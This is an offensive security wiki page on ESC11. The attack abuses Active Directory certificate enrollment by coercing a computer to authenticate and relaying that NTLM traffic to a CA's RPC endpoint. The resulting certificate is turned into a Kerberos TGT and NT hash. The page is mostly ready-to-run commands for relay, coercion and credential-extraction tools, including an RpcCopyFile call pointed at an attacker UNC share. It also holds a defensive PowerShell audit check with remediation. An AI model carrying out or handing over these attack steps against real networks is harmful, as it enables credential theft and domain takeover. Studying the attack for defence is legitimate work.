# ESC11

> **TL;DR**
>
> ESC11 lets you obtain a certificate on behalf of an elevated computer/user account and use that certificate for client authentication using Kerberos.

A certificate authority is vulnerable to ESC11 if its RPC enrollment interface accepts NTLM authentication and does not enforce protections such as Extended Protection for Authentication (EPA). An attacker can then relay NTLM authentication captured from another host to the certificate authority's RPC endpoint and enroll a certificate as the relayed account.
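Whether the RPC enrollment interface is relayable can be audited directly on the CA. The PowerShell below is an added check, not part of the original page: it reads the CA's `InterfaceFlags` registry value (the same value `certutil -getreg CA\InterfaceFlags` displays) and tests the `IF_ENFORCEENCRYPTICERTREQUEST` bit (0x200), which makes the MS-ICPR interface require RPC packet privacy and so defeats the relay. It assumes it runs in an elevated session on the CA host; `Test-CaRpcEncryptionEnforced` is a hypothetical helper name.

```powershell
# Added audit check (not from the original page). Run elevated on the CA host.
# InterfaceFlags lives under the CA's own configuration key; bit 0x200 is
# IF_ENFORCEENCRYPTICERTREQUEST (require encrypted/packet-privacy RPC requests).
$IF_ENFORCEENCRYPTICERTREQUEST = 0x200
$configKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'

# Hypothetical helper name: returns $true when the CA requires encrypted
# ICertPassage (MS-ICPR) requests, i.e. when the ESC11 relay is blocked.
function Test-CaRpcEncryptionEnforced {
    param([Parameter(Mandatory)][string]$CaName)

    $caKey = Join-Path $configKey $CaName
    $flags = (Get-ItemProperty -Path $caKey -Name InterfaceFlags -ErrorAction Stop).InterfaceFlags
    return [bool]($flags -band $IF_ENFORCEENCRYPTICERTREQUEST)
}

# The 'Active' value of the Configuration key names the CA hosted on this server.
$caName = (Get-ItemProperty -Path $configKey -Name Active -ErrorAction Stop).Active

if (Test-CaRpcEncryptionEnforced -CaName $caName) {
    Write-Host "[OK] $caName requires encrypted RPC enrollment requests (IF_ENFORCEENCRYPTICERTREQUEST is set)."
} else {
    Write-Warning "[VULN] $caName accepts unencrypted RPC enrollment requests; NTLM relay to its MS-ICPR endpoint (ESC11) is possible."
    Write-Host 'Remediation: certutil -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST, then restart the CertSvc service.'
}
```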

To exploit ESC11, we need a way to coerce a target computer into authenticating to an attacker-controlled computer. This is commonly done by abusing Remote Procedure Call (RPC) interfaces exposed by the target that can be made to trigger outbound authentication.

{% hint style="info" %}
An RPC function, *RpcCopyFile*, exists that takes three arguments: a *SrcFile* UNC path, a *DstFile* UNC path, and any flags you want to give it.

The *RpcCopyFile* function simply attempts to copy the file at the *SrcFile* path to the location given by *DstFile*. However, if the *SrcFile* path points to a different computer, the target computer that receives the RPC call will connect to that other computer to fetch *SrcFile*, authenticating to it in the process.

Putting it all together, if you want to coerce a target computer into authenticating to the attacker's computer, send it the following RPC function call:

`RpcCopyFile(SrcFile="\\attacker_ip\share\file.txt", DstFile="C:\Temp\file.txt")`
{% endhint %}

{% embed url="https://www.youtube.com/watch?v=JWI_khgpyYM" %}

When the target computer attempts to authenticate to the attacker computer, we will then need to relay the authentication traffic from the target computer to the vulnerable RPC interface.

Once the certificate is obtained, we can use the certificate to obtain a Kerberos Ticket Granting Ticket (TGT) for the computer account using the PKINIT Kerberos extension.

{% hint style="info" %}
Check out [unpac-the-hash](https://stuff.weelee.zip/network/on-prem-active-directory/kerberos/unpac-the-hash "mention") to learn how we can obtain the account's NTLM hash using PKINIT.
{% endhint %}

## Exploit

### Set Up Relay On Attacker Computer

{% tabs %}
{% tab title="Certipy.py" %}
{% embed url="https://github.com/ly4k/Certipy" %}

{% code title="Linux (Attacker)" %}

```fish
certipy relay -target 'rpc://[CA FQDN]' -ca '[CA name]' -template [template]
```

{% endcode %}
{% endtab %}

{% tab title="ntlmrelayx.py" %}
{% embed url="https://github.com/fortra/impacket" %}

{% code title="Linux (Attacker)" %}

```fish
ntlmrelayx.py -t rpc://[CA FQDN] -rpc-mode ICPR -icpr-ca-name [CA name] -smb2support
```

{% endcode %}

{% hint style="info" %}
If you are going to relay authentication from a Domain Controller, you must add `--template DomainController` to your command.
{% endhint %}
{% endtab %}

{% tab title="ADCSPwn.exe" %}
{% embed url="https://github.com/bats3c/ADCSPwn" %}

{% code title="Linux/Windows (Attacker)" %}

```
ADCSPwn.exe --adcs [CA FQDN]
```

{% endcode %}

{% hint style="info" %}
If successful, the relay tool hands you the obtained certificate: *impacket-ntlmrelayx* prints it base64-encoded, while Certipy writes it to a `.pfx` file.
{% endhint %}
{% endtab %}
{% endtabs %}

### Coerce A Target Computer To Authenticate to the Attacker's Computer

{% tabs %}
{% tab title="Coercer" %}
{% embed url="https://github.com/p0dalirius/Coercer" %}

{% code title="Linux (Attacker)" %}

```fish
Coercer coerce -l [attacker ip] -t [target ip] -u [username] -p [password] -d [domain]
```

{% endcode %}
{% endtab %}

{% tab title="PetitPotam.py" %}
{% embed url="https://github.com/topotam/PetitPotam" %}

{% code title="Linux (Attacker)" %}

```fish
PetitPotam.py [listener] [target]
```

{% endcode %}

{% hint style="info" %}
Note that there is the original (OG) unauthenticated version of PetitPotam as well as an authenticated version. The command above uses the unauthenticated version.
{% endhint %}
{% endtab %}

{% tab title="SharpSpoolTrigger.exe" %}
{% embed url="https://github.com/cube0x0/SharpSystemTriggers" %}

{% code title="Windows (Target)" %}

```
SharpSpoolTrigger.exe [target ip] [listener ip]
```

{% endcode %}
{% endtab %}
{% endtabs %}

### Obtain The Target Computer Account's NT Hash

{% tabs %}
{% tab title="Certipy.py" %}
{% embed url="https://github.com/ly4k/Certipy" %}

{% code title="Linux" %}

```fish
certipy auth -pfx [.pfx output] -dc-ip [DC IP]
```

{% endcode %}

{% hint style="info" %}
`certipy auth` takes the certificate in `.pfx` format (the file written by `certipy relay`) and uses PKINIT to obtain a TGT and, from it, the account's NT hash.
{% endhint %}
{% endtab %}
{% endtabs %}
